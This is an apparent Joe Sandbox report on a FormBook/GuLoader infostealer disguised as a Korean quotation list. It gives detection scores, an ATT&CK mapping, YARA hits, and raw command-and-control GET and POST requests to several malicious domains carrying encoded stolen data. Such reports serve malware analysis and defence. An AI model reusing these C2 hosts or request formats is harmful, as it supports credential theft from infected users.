
Analysis Report 견적 품목 리스트.bin

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 219336
Start date: 01.04.2020
Start time: 02:48:26
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 19m 57s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 견적 품목 리스트.bin (renamed file extension from bin to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@35/12@49/5
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 57.3% (good quality ratio 51.2%)
  • Quality average: 73.3%
  • Quality standard deviation: 31.6%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 166
  • Number of non-executed functions: 284
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12, 2.18.68.82, 67.26.75.254, 8.241.121.126, 67.27.157.254, 67.27.159.126, 67.26.137.254, 67.26.83.254, 67.27.157.126, 8.253.207.120, 8.253.95.249, 93.184.221.240, 2.20.143.16, 2.20.143.23, 205.185.216.42, 205.185.216.10
  • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, au.download.windowsupdate.com.edgesuite.net, odc-dm-files-geo.onedrive.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-dm-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, l-0003.l-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, au.download.windowsupdate.com.hwcdn.net, hlb.apr-52dd2-0.edgecastdns.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, odc-dm-files-brs.onedrive.akadns.net, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, cds.d2s7q6s2.hwcdn.net
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Whitelisted: false
Threat: FormBook, GuLoader
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Registry Run Keys / Startup Folder21Process Injection512Software Packing1Credential Dumping1Security Software Discovery221Remote File Copy3Man in the Browser1Data Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaExecution through Module Load1Port MonitorsAccessibility FeaturesDeobfuscate/Decode Files or Information1Input Capture1System Network Connections Discovery1Remote ServicesData from Local System1Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesGraphical User Interface1Accessibility FeaturesPath InterceptionScripting11Input CaptureFile and Directory Discovery2Windows Remote ManagementEmail Collection1Automated ExfiltrationStandard Non-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or Information2Credentials in FilesSystem Information Discovery13Logon ScriptsInput Capture1Data EncryptedStandard Application Layer Protocol14SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasquerading1Account ManipulationVirtualization/Sandbox Evasion12Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion12Brute ForceProcess Discovery2Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskProcess Injection512Two-Factor Authentication InterceptionRemote System Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionIndicator BlockingBash HistorySystem Network Configuration Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Signature Overview



AV Detection:

Multi AV Scanner detection for domain / URL
Source: http://www.allixanes.com/sa22/ Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: 견적 품목 리스트.exe Virustotal: Detection: 26%
Source: 견적 품목 리스트.exe ReversingLabs: Detection: 38%
Yara detected FormBook
Source: Yara match, File source: 00000005.00000002.936093552.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.896346552.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.931730236.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000001A.00000002.1277253347.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000001A.00000002.1282450545.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.890369559.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.901044828.000000000D3B2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.914336084.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.922687997.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.견적 품목 리스트.exe.2360000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 24.2.gdi4hxdb6.exe.2390000.1.unpack Avira: Label: TR/Dropper.Gen

Networking:

Tries to resolve many domain names, but no domain seems valid
Source: unknownDNS traffic detected: query: www.xiangkanla.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.24protrade.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.amroech.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.augmentedgame.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.usmantechstaffing.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.c36c.loan replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.lisacinsy.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.iloveposts.us replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.sspifgmcputactn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.carlekblad.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.rmk8.com replaycode: Name error (3)
Uses netstat to query active network connections and open ports
Source: unknown, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Domain name seen in connection with other malware
Source: Joe Sandbox View, Domain Name: www.allixanes.com
HTTP GET or POST without a user agent
Source: global traffic, HTTP traffic detected: GET /sa22/?xL3hLB=aVqR6HBe4HPb3lExG0zvWIwAu17MGRwlbJLJc79qbxuvrCEeo+JL0PcaWaEsBxFMbHEl&aBR=nzuD_jr HTTP/1.1 Host: www.breeze-iwaki.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sa22/?xL3hLB=JMM0tJynmL2eFOFZA7GZSDXDp6JdgYgBE5qXu9CROMtt3yZ3f8zQfhoL7xY9xPLh1bda&aBR=nzuD_jr HTTP/1.1 Host: www.allixanes.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sa22/?xL3hLB=NsNsxeBPlrPiTgS9PP58UUflimdpAUL5lqUDkgQyH8o5OCzmy0StWinhpygoIu1EeSbM&aBR=nzuD_jr HTTP/1.1 Host: www.ontariobrokers.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sa22/?xL3hLB=B5PZdHLghsUOEGl3YThmAxwc5Q2JZtslVwuxmQEXEBgCU6TSZbpNnkclXQwV4rvxtjxB&aBR=nzuD_jr HTTP/1.1 Host: www.zhiguohulian.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sa22/?xL3hLB=mJWPVSoyqfPZs8UJSkt9FmfqvIPNq9yK3Wcj61pPIQpPL4OfnZhXtLvw2+R7wcITKeuf&aBR=nzuD_jr HTTP/1.1 Host: www.unitedgamesreviews.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View, IP Address: 50.63.202.45
Internet Provider seen in connection with other malware
Source: Joe Sandbox View, ASN Name: unknown
Uses a known web browser user agent for HTTP communication
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.allixanes.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.allixanes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.allixanes.com/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 42 75 41 4f 7a 73 53 72 35 76 4f 66 63 38 39 38 62 62 62 6a 43 55 50 5a 67 36 31 30 70 37 4d 51 55 50 50 53 7a 71 4b 4d 4e 4e 77 6f 33 79 52 6e 57 65 4b 47 54 30 45 53 68 52 74 46 38 36 33 4d 6c 61 56 58 44 4d 76 62 77 79 57 6f 65 7a 51 55 69 44 35 43 74 75 74 63 41 37 32 31 38 4f 54 44 52 43 4c 4b 36 52 67 31 72 5f 6a 76 37 6c 48 73 78 6a 4b 4c 4c 42 62 62 42 4d 36 32 35 43 31 34 69 2d 30 33 6e 38 56 45 65 72 50 61 4b 65 6d 36 6f 41 67 78 78 76 75 57 44 59 34 5a 48 79 34 66 54 38 69 75 52 6e 6f 62 53 31 54 41 77 5f 7e 70 37 78 35 6f 45 77 44 51 71 6a 34 4c 62 56 58 57 42 54 64 51 65 6b 65 39 51 58 37 56 34 66 6e 39 6c 4d 4d 76 4a 34 45 64 4f 31 51 4e 74 4e 37 4e 6d 33 41 41 4b 2d 4d 78 34 4f 33 41 67 44 54 5f 68 52 59 74 61 79 30 75 59 45 31 4b 65 4f 33 58 48 42 4d 32 6a 54 36 54 7e 4f 55 63 44 5a 65 61 72 57 39 51 43 59 6b 42 56 44 7e 73 28 37 76 39 56 5f 6f 45 47 62 75 74 33 5f 71 77 4e 74 46 67 64 38 73 39 6c 54 43 62 56 59 61 38 63 5a 28 75 57 44 76 2d 77 49 31 63 64 65 77 39 30 45 42 41 70 6a 54 5f 47 51 46 4f 39 73 49 54 30 37 30 68 44 6b 37 4c 77 44 43 30 6e 51 6f 51 75 51 69 6b 4f 4c 37 6b 53 58 7e 39 6c 2d 77 2d 58 7a 6e 6f 5a 4e 64 48 73 63 7e 32 54 4e 78 49 64 71 49 6d 35 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
xL3hLB=BuAOzsSr5vOfc898bbbjCUPZg610p7MQUPPSzqKMNNwo3yRnWeKGT0EShRtF863MlaVXDMvbwyWoezQUiD5CtutcA7218OTDRCLK6Rg1r_jv7lHsxjKLLBbbBM625C14i-03n8VEerPaKem6oAgxxvuWDY4ZHy4fT8iuRnobS1TAw_~p7x5oEwDQqj4LbVXWBTdQeke9QX7V4fn9lMMvJ4EdO1QNtN7Nm3AAK-Mx4O3AgDT_hRYtay0uYE1KeO3XHBM2jT6T~OUcDZearW9QCYkBVD~s(7v9V_oEGbut3_qwNtFgd8s9lTCbVYa8cZ(uWDv-wI1cdew90EBApjT_GQFO9sIT070hDk7LwDC0nQoQuQikOL7kSX~9l-w-XznoZNdHsc~2TNxIdqIm5A).
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.allixanes.comConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.allixanes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.allixanes.com/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 42 75 41 4f 7a 75 7a 53 37 66 37 52 57 65 56 30 4b 4d 36 46 46 45 6e 62 69 4a 5a 34 33 63 34 45 57 64 37 5a 7a 71 61 51 46 76 46 76 6d 44 68 6e 51 64 69 42 61 30 46 67 6a 52 74 43 32 61 7a 65 73 70 56 66 44 4e 36 4d 77 79 65 72 55 52 35 5f 69 7a 35 56 73 4f 78 77 45 4e 62 72 38 4d 58 32 66 48 54 6f 71 67 63 31 79 50 37 74 33 67 6a 7a 68 53 47 4f 49 78 76 44 44 4d 69 64 35 79 5a 41 6a 64 49 65 76 64 4a 47 62 5a 53 58 47 5f 58 66 76 58 45 45 73 76 36 56 4d 37 46 48 4a 77 41 62 65 64 69 41 4e 32 6f 63 63 57 6a 65 33 34 62 63 74 77 73 65 47 67 54 45 71 67 59 39 59 57 79 51 46 52 34 66 63 56 53 54 49 31 58 62 6d 59 47 6f 76 6f 73 57 50 37 4e 5f 52 45 67 4b 70 63 58 63 72 56 35 4e 48 5f 6b 43 37 5f 37 63 34 44 44 58 6d 43 30 6c 53 53 45 42 56 6e 6c 64 48 4b 43 55 45 44 68 6e 75 54 37 31 38 4f 55 51 49 4a 66 6a 75 57 4a 48 45 4a 55 5f 5a 6b 6a 72 28 76 65 68 5a 63 63 32 62 71 71 57 31 50 71 30 44 35 70 49 5a 74 34 32 76 7a 6e 71 47 49 61 7a 58 36 58 70 57 44 75 50 77 4d 67 33 62 76 6b 39 32 52 55 63 71 41 37 7a 58 41 45 4d 37 38 34 52 74 35 67 78 44 6b 6a 4c 77 33 50 68 6d 6a 49 51 6b 68 53 6e 4f 71 37 6b 52 6e 7e 39 70 65 78 64 59 69 57 32 57 36 31 6f 67 39 54 32 63 5a 73 32 59 72 5a 32 74 70 32 42 72 31 69 6a 54 42 39 68 78 71 48 39 41 62 76 77 4d 36 70 54 58 34 42 31 49 36 64 52 44 63 35 4a 43 37 5a 75 75 42 6f 53 4e 32 34 42 33 30 67 64 43 39 56 71 74 4d 53 51 77 70 6c 68 51 47 39 30 57 38 4d 45 56 49 47 66 35 72 50 48 57 4b 61 53 47 71 42 54 44 61 42 55 7a 6e 43 52 65 6a 61 6d 56 65 28 56 48 57 5a 70 34 64 46 31 72 49 55 77 55 
6f 67 44 53 74 50 72 6f 62 79 5f 35 6c 71 41 32 6d 61 32 44 77 6a 76 51 79 4e 57 45 62 37 74 4a 4b 58 43 78 47 62 44 6c 51 31 42 44 62 43 63 6c 44 4d 69 47 52 44 6b 74 34 32 67 35 39 69 43 49 48 28 6e 57 71 42 59 64 66 67 36 5a 4c 4c 4a 38 51 71 70 72 30 53 5a 67 45 34 5f 39 75 31 61 78 57 48 32 39 59 38 73 73 74 4e 6a 33 46 6e 4a 73 4d 4b 6b 4b 74 53 62 35 32 35 32 4b 4c 4b 50 51 75 51 69 42 49 41 79 78 41 59 42 64 76 70 75 41 7a 37 48 4d 76 6a 64 44 61 59 64 36 73 4c 2d 46 53 38 62 74 4a 68 4b 49 36 38 37 50 79 67 37 76 4d 6d 44 6d 76 67 43 7a 4a 51 50 68 45 75 61 30 2d 53 54 58 38 61 76 75 78 39 45 55 59 35 63 66 31 58 59 76 6d 59 4f 66 76 6a 69 6e 58 41 52 50 58 73 6e 43 66 62 51 33 7a 35 75 6f 6c 6a 66 66 4e 50 6e 45 61 63 47 61 31 46 34 28 68 58 52 59 50 56 6b 7e 46 72 52 75 55 6b 4f 62 4d 54 39 38 57 46 55 37 4f 6e 43 7e 32 4f 52 50 62 54 42 50 6d 51 43 4a 58 31 7a 50 46 51 77 77 75 45 55 71 53 62 6b 43 72 38 6e 6d 57 41 6a 68 54 39 78 69 45 56 4c 45 30 74 55 30 47 79 70 66 65 49 4c 69 63 42 55 57 71
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 37 77 75 36 2d 57 38 47 52 48 4e 51 70 51 6a 4a 68 6e 62 67 53 52 4a 56 67 57 6e 31 39 56 65 79 7a 59 72 42 38 6b 70 4a 42 33 45 69 58 76 66 51 57 79 5f 7e 52 6c 66 42 62 38 6f 47 41 36 55 63 7a 42 6d 4e 59 59 6b 79 44 69 6a 6a 44 53 41 67 5a 79 56 73 59 6a 50 45 42 4e 43 75 73 66 57 34 37 6a 69 63 52 47 44 41 39 31 55 57 36 63 4c 72 49 4f 4a 63 5f 50 4f 63 78 36 32 44 7a 4f 31 39 76 77 6a 55 55 28 78 43 6b 35 6d 49 53 45 77 46 4b 65 75 50 61 36 4c 4b 6b 59 42 6b 41 78 74 75 35 45 58 41 2d 72 70 5a 62 72 35 4b 78 38 70 35 43 30 42 41 31 65 69 34 35 36 54 59 51 4e 59 62 79 70 4e 6e 70 28 44 43 63 36 69 77 32 51 47 76 62 6d 33 4e 68 69 75 39 62 32 6d 43 4f 28 58 6d 51 30 6d 79 48 4e 39 43 4e 6f 43 72 55 51 59 6c 47 55 42 38 6e 71 4d 51 61 56 49 6a 52 4f 66 70 65 63 76 71 4b 28 33 31 70 35 75 70 54 4e 65 78 61 56 75 53 39 65 4a 45 73 4f 33 33 65 76 49 35 32 66 4c 5a 52 52 68 45 59 72 69 70 57 74 69 71 65 7e 30 39 46 47 54 65 56 77 77 58 51 61 53 5a 4f 70 35 41 78 72 67 74 48 32 4b 4a 6f 31 79 63 55 50 49 57 54 34 53 63 66 4b 62 6f 54 44 63 53 5f 4b 4e 7a 56 53 49 47 71 57 39 64 61 39 4e 73 70 56 48 43 51 41 46 53 6b 35 41 77 4e 6a 44 68 46 39 30 39 64 62 73 74 5a 74 53 41 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
xL3hLB=FOBWv7wu6-W8GRHNQpQjJhnbgSRJVgWn19VeyzYrB8kpJB3EiXvfQWy_~RlfBb8oGA6UczBmNYYkyDijjDSAgZyVsYjPEBNCusfW47jicRGDA91UW6cLrIOJc_POcx62DzO19vwjUU(xCk5mISEwFKeuPa6LKkYBkAxtu5EXA-rpZbr5Kx8p5C0BA1ei456TYQNYbypNnp(DCc6iw2QGvbm3Nhiu9b2mCO(XmQ0myHN9CNoCrUQYlGUB8nqMQaVIjROfpecvqK(31p5upTNexaVuS9eJEsO33evI52fLZRRhEYripWtiqe~09FGTeVwwXQaSZOp5AxrgtH2KJo1ycUPIWT4ScfKboTDcS_KNzVSIGqW9da9NspVHCQAFSk5AwNjDhF909dbstZtSAg).
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 35 51 45 34 50 69 68 51 33 61 75 46 72 38 43 41 53 6e 56 73 44 42 64 4b 6e 37 42 32 71 45 42 79 33 6c 73 4a 65 4d 42 65 78 48 45 7a 42 54 59 57 32 79 38 32 78 6c 59 51 72 35 52 50 33 6d 6d 63 7a 70 4d 4e 59 67 6e 34 68 71 6d 6a 54 54 49 67 35 76 75 71 59 33 55 45 48 55 69 75 4b 47 46 75 72 76 69 44 78 75 64 63 6f 51 57 42 4c 67 36 73 4d 57 52 54 64 4f 61 41 53 7e 65 4d 31 66 6d 34 71 52 46 52 6d 6a 34 48 6b 6f 7a 43 68 6b 4a 4a 36 36 58 45 35 47 59 4f 48 38 46 6c 46 64 6c 79 6f 45 55 66 65 7a 72 50 4c 62 75 4f 41 70 4f 71 6a 45 56 41 79 44 61 28 50 36 43 53 33 4e 51 61 44 6c 6a 28 4c 54 42 48 64 37 68 30 31 70 6c 74 59 4f 59 42 45 66 79 36 4c 72 38 48 4c 36 53 69 43 45 4e 30 32 52 70 52 35 6b 2d 72 48 64 56 73 6e 6b 75 6d 51 32 6c 4a 37 35 41 6b 54 43 74 6e 65 63 45 6f 4b 28 37 39 35 34 52 73 54 4a 52 31 4a 64 51 4b 75 50 43 45 5f 61 64 6b 73 72 32 39 55 69 39 66 78 52 39 51 34 36 56 76 45 42 35 76 5a 57 45 33 6c 47 51 61 58 6f 35 58 51 62 70 5a 4b 64 54 44 68 50 67 38 43 6a 4f 50 4c 4e 75 65 55 4f 55 56 44 6f 51 56 4a 6d 31 6f 54 62 63 54 4b 6d 33 79 69 4f 49 4d 63 79 2d 64 37 39 4e 69 35 56 48 62 41 42 72 64 6e 4d 4b 38 36 44 46 71 54 49 50 31 59 4f 67 68 4c 6b 57 61 57 73 6e 59 4c 46 7a 4a 5f 51 57 69 39 32 74 45 52 37 6b 50 45 7e 58 45 5a 68 69 66 4d 28 73 66 6a 54 6c 79 63 28 7a 31 44 56 75 35 76 7a 38 35 55 66 53 33 66 53 31 5a 4d 53 6d 28 70 56 71 6a 38 43 72 6c 69 66 56 4c 33 62 77 34 77 41 75 35 32 7a 48 34 38 43 34 28 51 66 52 35 7a 70 6f 6d 74 71 67 44 72 36 45 64 69 61 79 32 42 33 
62 50 63 66 59 47 50 34 59 6f 56 4c 45 6d 4f 59 45 70 5f 7a 37 34 33 71 4e 66 44 55 65 49 68 61 4b 28 66 76 35 7e 4d 44 31 63 73 43 33 53 42 75 72 77 63 28 74 7e 44 49 77 4d 49 51 56 4f 4c 4e 55 47 58 75 6d 59 56 7a 74 6d 61 28 61 43 4d 69 6f 42 53 73 62 58 4d 38 71 71 41 42 62 35 78 31 49 43 79 64 46 63 47 67 37 61 51 55 38 59 53 70 4d 66 38 66 76 73 34 70 63 30 59 56 75 67 53 41 77 33 63 32 50 52 33 64 55 6c 6e 77 38 74 54 44 38 75 4f 65 63 4f 72 69 6a 50 53 38 58 6e 37 38 7a 6b 35 47 37 35 59 77 6b 7e 4e 63 35 45 4a 6e 43 35 6e 61 51 4d 47 33 4f 41 44 6c 36 4a 66 33 42 61 65 51 52 42 65 63 78 79 73 73 43 30 51 47 6d 28 74 62 38 73 51 65 6c 67 38 73 76 64 58 4c 4f 68 76 39 65 35 58 45 32 67 55 33 61 70 78 77 63 77 4e 37 51 33 36 61 6e 46 6f 64 4b 6c 68 6a 69 46 72 4b 35 5a 64 59 67 46 53 65 64 37 4c 61 62 79 70 49 33 69 4b 50 37 56 64 4e 2d 69 43 61 41 44 4f 33 4c 44 69 62 67 54 70 34 58 37 42 79 42 6d 37 6b 35 7a 4d 4d 2d 33 63 55 31 59 55 6b 4b 75 6d 59 36 7a 52 33 71 31 45 6b 35 77 33 38 48 5a 78 4c 65
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 35 51 45 34 50 69 68 51 33 61 75 46 72 38 43 41 53 6e 56 73 44 42 64 4b 6e 37 42 32 71 45 42 79 33 6c 73 4a 65 4d 42 65 78 48 45 7a 42 54 59 57 32 79 38 32 78 6c 59 51 72 35 52 50 33 6d 6d 63 7a 70 4d 4e 59 67 6e 34 68 71 6d 6a 54 54 49 67 35 76 75 71 59 33 55 45 48 55 69 75 4b 47 46 75 72 76 69 44 78 75 64 63 6f 51 57 42 Data Ascii: xL3hLB=FOBWv5QE4PihQ3auFr8CASnVsDBdKn7B2qEBy3lsJeMBexHEzBTYW2y82xlYQr5RP3mmczpMNYgn4hqmjTTIg5vuqY3UEHUiuKGFurviDxudcoQWB
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 37 77 75 36 2d 57 38 47 52 48 4e 51 70 51 6a 4a 68 6e 62 67 53 52 4a 56 67 57 6e 31 39 56 65 79 7a 59 72 42 38 6b 70 4a 42 33 45 69 58 76 66 51 57 79 5f 7e 52 6c 66 42 62 38 6f 47 41 36 55 63 7a 42 6d 4e 59 59 6b 79 44 69 6a 6a 44 53 41 67 5a 79 56 73 59 6a 50 45 42 4e 43 75 73 66 57 34 37 6a 69 63 52 47 44 41 39 31 55 57 36 63 4c Data Ascii: xL3hLB=FOBWv7wu6-W8GRHNQpQjJhnbgSRJVgWn19VeyzYrB8kpJB3EiXvfQWy_~RlfBb8oGA6UczBmNYYkyDijjDSAgZyVsYjPEBNCusfW47jicRGDA91UW6cL
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 35 51 45 34 50 69 68 51 33 61 75 46 72 38 43 41 53 6e 56 73 44 42 64 4b 6e 37 42 32 71 45 42 79 33 6c 73 4a 65 4d 42 65 78 48 45 7a 42 54 59 57 32 79 38 32 78 6c 59 51 72 35 52 50 33 6d 6d 63 7a 70 4d 4e 59 67 6e 34 68 71 6d 6a 54 54 49 67 35 76 75 71 59 33 55 45 48 55 69 75 4b 47 46 75 72 76 69 44 78 75 64 63 6f 51 57 42 Data Ascii: xL3hLB=FOBWv5QE4PihQ3auFr8CASnVsDBdKn7B2qEBy3lsJeMBexHEzBTYW2y82xlYQr5RP3mmczpMNYgn4hqmjTTIg5vuqY3UEHUiuKGFurviDxudcoQWB
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 37 77 75 36 2d 57 38 47 52 48 4e 51 70 51 6a 4a 68 6e 62 67 53 52 4a 56 67 57 6e 31 39 56 65 79 7a 59 72 42 38 6b 70 4a 42 33 45 69 58 76 66 51 57 79 5f 7e 52 6c 66 42 62 38 6f 47 41 36 55 63 7a 42 6d 4e 59 59 6b 79 44 69 6a 6a 44 53 41 67 5a 79 56 73 59 6a 50 45 42 4e 43 75 73 66 57 34 37 6a 69 63 52 47 44 41 39 31 55 57 36 63 4c Data Ascii: 